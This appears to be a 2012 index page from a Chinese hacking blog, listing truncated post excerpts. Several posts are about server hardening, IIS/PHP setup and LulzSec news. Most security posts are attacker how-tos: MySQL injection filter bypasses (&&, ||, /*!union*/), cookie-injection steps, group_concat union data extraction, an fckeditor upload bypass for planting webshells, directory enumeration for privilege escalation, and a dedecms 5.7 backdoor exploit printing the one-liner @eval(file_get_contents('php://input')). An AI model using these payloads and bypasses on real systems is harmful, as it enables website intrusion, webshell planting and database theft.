mysql注入对and or的过滤及uinon select等过滤的一个方法突破

   
分类:安全 | 2012-04-11 | 撸过 1,079 次
0人扯蛋

1.and 用&& 代替

 

2. or 用||代替

 

3.union select from 变成 /*!union*/这种。

 

一个例子:

 

https://www.webshell.cc/ select 1 /*!union*/ select 2 from adad where 1&&1

 

 

 

 [......]

继续阅读

利用for命令提权

   
分类:安全 | 2012-04-11 | 撸过 952 次
0人扯蛋

for /r d:\wwwroot\web\webshell.cc\ %i in (*.asp) do @echo %i >>c:\windows\temp\1.txt

是把d:\wwwroot\web\目录下所有asp文件列出来 ,然后保存在c:\windows\temp\下的1.txt

 

==========================华丽的分割线============================

 

 

 

for /d %i in (d:\wwwroot\web\*) do @echo %i

这句是显示d:[......]

继续阅读

简单的服务器安全配置

   
分类:技术 | 2012-04-11 | 撸过 1,083 次
1人扯蛋

经测试,本配置在Win2003 + IIS6.0 + Serv-U + SQL Server 的单服务器多网站中一切正常。以下配置中打勾的为推荐进行配置,打叉的为可选配置。

一、系统权限的设置

1、磁盘权限

系统盘只给 Administrators 组和 SYSTEM 的完全控制权限

其他磁盘只给 Administrators 组完全控制权限

系统盘\Documents and Settings 目录只给 Administrators 组和 SYSTEM 的完全控制权限

系统盘\Documents and Settings\All Users 目录只给 Administrato[......]

继续阅读

windows下IIS加载Rewrite.dll不成功的解决方法

   
分类:技术 | 2012-04-6 | 撸过 1,996 次
0人扯蛋

windows下IIS加载Rewrite.dll不成功的解决方法

 

症状:加载rewrite模块后,不显示向上的绿箭头,而是向下的红箭头。

 

结果:加载不成功!

 

这个多半都是目录权限的问题!

 

1.Rewrite文件夹一定要有users组的默认权限

 

网上也有说还要加上一下两个权限的,个人觉得没必要,尽是造成安全隐晦的!

 

1.给Rewrite文件夹添加everyone用户,给所有权限

 

2.给Rewrite文件夹加上IIS_WPG用户,给默认权限

 

我的就只有ad[......]

继续阅读

win2008下如何快速安装PHP,并做好安全设置

   
分类:技术 | 2012-04-3 | 撸过 1,605 次
2人扯蛋

虽然现在跑PHP的最佳选择还是Linux,但是随着Windows Server 2008 的出现,前者和后者的差距已经大大缩小,对于不懂Linux操作的朋友,可以丢弃Windows 2003 Server了,选择更好的Windows Server 2008。

 

在Windows Server 2008下配置PHP环境特别的快,只需要鼠标点点就可以了。

 

1,下载PHP5.2系列版本,目前5.2系列比5.3系列兼容性更好。其中又分为Non Thread Safe和Thread Safe版本,如果要用FastCGI模式运行PHP,就选择Non Thread Safe[......]

继续阅读

黑客组织LulzSec复出 公布17万军队成员账户

   
分类:新闻 | 2012-03-29 | 撸过 978 次
0人扯蛋

2011年的7月下旬,黑客组织LulzSec的一些成员被逮捕。该黑客组织曾于2011年在网站MilitarySingles.com上暴露了政府机构和公司成千上万个成员的电子邮件帐户,包括联邦调查局,中央情报局,索尼,甚至PBS。而似乎在沉寂了数个月后,LulzSec又有新动作,声称已经暴露近171,000个军队成员的帐户。

 

“这里有几份电子邮件,比如@us.army.mil carney.navy.mil; greatlakes.cnet.navy.mil @ microsoft.com等”LulzSec组织在PasteBin网站发布了一则警告,并表示“手握”包括单身士兵在交[......]

继续阅读

Cookies注入步骤

   
分类:安全 | 2012-03-26 | 撸过 2,478 次
0人扯蛋

Cookies注入步骤

1)寻找形如“*.asp?id=x”类的带参数的rul

2)去掉“id=x”查看页面显示是否正常。如果不正常,说明差数在数据传递中时直接起作用的

3)清空浏览器地址,输入“

javascript:alert(document.cookie=“id=”+escape("x"));

按Enter返回一个对话框,内容是“id=x”,然后用原来的url刷新页面,如果显示正常,

说明代码是用Request("ID")这种格式收集数据的,可以利用cookies进行注入

4)重复上面的步骤,将常规脚本注入判断语句戴入上面的URL:"

javascript:javascr[......]

继续阅读

fckeditor上传突破_方法

   
分类:安全 | 2012-03-26 | 撸过 1,359 次
0人扯蛋

有很多已经修补过的fckeditor 我们上传x.asp;y.jpg的时候 通常会变成x_asp;y.jpg 让我们的马失效

 

利用二次上传 可以 生成x(2).asp;y.jpg 可以突破 有些时候打了补丁的 让我们还是无法突破 通常 我们在www.webshell.cc/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

新建 一个x.asp的文件夹 可饶过, 但有些变态的 程[......]

继续阅读

php mysql注入的一种快速有效union方法select出数据库内容

   
分类:安全 | 2012-03-23 | 撸过 1,387 次
0人扯蛋

php sql injector的时候,很多情况下都是显示一行一行的数据,要一次得到全部数据或者表格,那就的重复多次。

 

函数group_concat可以实现将表格放入一个单元格中(即仅有一行一列)

 

例如:

 

select group_concat(id,0x7c,name,0x7c,tel,0x5d) from g

 

那么将得到:

 

1|张三|83023023],|李四|13893232322],.....

 

(注意上面查询结果不是一行多列,而是一行一列)

 

假设原来的sql注入[......]

继续阅读

dedecms 5.7 一句话后门利用 exp

   
分类:安全 | 2012-03-22 | 撸过 2,660 次
0人扯蛋

author:舞林

tx微博:http://t.qq.com/wulinlw

晚上看到这个

http://www.wooyun.org/bug.php?action=view&id=5416

shopcar.class.php 被植入一句话

@eval(file_get_contents('php://input'));

去官网下了一套回来,看了下代码,

class MemberShops
{
    var $OrdersId;
    var $productsId;
    function __construct()
    {
        $this->Or[......]

继续阅读